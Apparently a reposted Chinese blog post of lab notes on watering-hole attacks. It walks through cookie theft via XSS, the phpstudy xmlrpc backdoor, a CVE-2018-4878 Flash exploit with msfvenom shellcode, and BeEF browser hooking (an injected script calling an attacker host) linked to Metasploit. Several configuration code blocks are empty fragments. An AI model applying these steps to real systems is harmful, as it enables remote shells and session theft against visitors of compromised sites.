目錄
水坑攻擊
盜取Cookie
phpstudy backdoor
JSONP
Adobe flash player 28(CVE-2018-4878)
Beef 攻擊框架
水坑攻擊
分析并了解目標的上網活動規律,尋找目標經常訪問的網站的漏洞,利用 漏洞在該網站植入惡意代碼(陷阱、水坑),在目標進行訪問時,攻擊形 成, 多種可能被植入的代碼,包括:
- 1. 通過注入某些形式的惡意代碼,例如:JavaScript、iframe、跨站腳本 等
- 2. 植入惡意的廣告鏈接
- 3. 內置的 Web 應用程式介面用于插入任何其他型別的物件,該物件可用 于顯示 Web 內容或包含在訪問客戶端上執行的腳本(例如,論壇帖 子,評論和其他用戶可控制的 Web 內容)
- 4. 重定向用戶所經常訪問的站點到惡意站點
盜取Cookie
地址:https://blog.51cto.com/tdcqvip/2105099
環境:使用xss測驗平臺【https://xsshs.cn/xss.php?do=project&act=view&id=43573】
靶機pikachu
程序
1、打開靶機平臺,輸入XSS測驗平臺的代碼
2、查看可以使用的代碼xss
3、運行結果后查看獲取cookie
phpstudy backdoor
概述
后門代碼存在于/ext/php_xmlrpc.dll模塊中,用戶可以通過搜索php_xmlrpc.dll模塊中包含“@eval”關鍵字快速判斷是否存在后門;遞回檢測當前目錄下的dll檔案中是否有相應字符;
*程式包自帶的PHP的php_xmlrpc.dll模塊中有隱藏后門
條件
- php.ini中必須要參考該模塊,這樣才能去復現該漏洞,若開啟了xmlrpc功能,php就會加載這個php_xmlrpc.dll元件檔案,其中的惡意代碼就會被觸發,
- xml rpc是使用http協議做為傳輸協議的rpc機制(遠程程序呼叫),使用xml文本的方式傳輸命令和資料,
有問題的檔案
- Phpstudy\PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
- Phpstudy\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
- Phpstudy\PHPTutorial\php\php-5.4.45-nts\ext\php_xmlrpc.dll
影響
phpstudy 2016(php5.4/5.2) phpstudy 2018(php5.4/5.2)
附EXP:
https://github.com/Any3ite/phpstudy_backdoor
https://github.com/topics/phpstudybackdoor
程序
該后門利用比較簡單,僅需提交兩個引數
Accept-Encoding: gzip,deflate
Accept-Charset: Base64編碼(PHP代碼)
攻擊者:Windows 10系統
靶機: Windows 7虛擬機+phpstudy2016
找到php_xmlrpc.dll檔案查找是否存在eval函式內容
GET請求方式;在Accept-Encoding中,deflate的前面都有一個空格,這個空格導致重訪無法成功,去掉空格即可
JSONP
地址:https://www.4hou.com/posts/p7Op
Adobe flash player 28(CVE-2018-4878)
地址:https://github.com/r00tSe7en/Flash-Pop
https://github.com/wrlu/Vulnerabilities/blob/master/CVE-2018-4878/cve-2018-4878.py
環境:kali【192.168.245.128 】 和 win7【192.168.245.129 】
漏洞概述
2018年2月1號,Adobe官方發布安全通報(APSA18-01),宣告Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878),
攻擊者通過構造特殊的Flash鏈接,當用戶用瀏覽器/郵件/Office訪問此Flash鏈接時,會被“遠程代碼執行”,并且直接被getshell; 直到2018年2月5號,Adboe才發布補丁來修復此0 day漏洞,
程序
攻擊機:Linux kali
靶機:Windows7 (安裝26版本的flash)
1、Linux 下載cve-2018-4878檔案包
2、利用msfvenom生成shell代碼
進入cve-2018-4878中將cve-2018-4878.py的內容替換為生成的shell代碼并且修改最下面的檔案存放路徑
3、cd 進入CVE-2018-4878目錄使用python命令編譯檔案
移動.html和.swf兩個檔案到apache中:
cp index.html /var/www/html/index.html
cp exploit.swf /var/www/html/exploit.swf
啟動metasploit:
靶機訪問構造好的網站http://攻擊機IP/index.html 即可獲取shell
Beef 攻擊框架
Kali linux 系統默認未安裝beef,需要自行安裝
| 1 2 |
|
啟動/usr/share/beef-xss
| 1 2 |
|
賬號密碼
127.0.0.1:3000/ui/pannel
beef/beef
嵌入代碼
<script src="Ip:3000/hook.js">
與Metasploit聯動
Beef組態檔
/usr/share/beef-xss/config.yaml
| 1 2 |
|
改成
| 1 2 |
|
vim/usr/share/beef-xss/extensions/metasploit/config.yaml
原:
| 1 |
|
修改成
| 1 |
|
修改 host callback_host兩引數,改為beef主機IP
重啟postgresq、metasploit、服務
1
service postgresql restart & service metasploit restart
msfconsole#啟動Metasploit
MSF
load msgrpc ServerHost=IP Pass=abc123
MSF設定:
use exploit/windows/browser/ie_execcommand_uaf
show options
setsrvhost IP
exploit/run
測驗: win7 x64與kali
參考鏈接
ATT&CK手冊.pdf
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/259175.html
標籤:其他
上一篇:局域網安全之ARP攻擊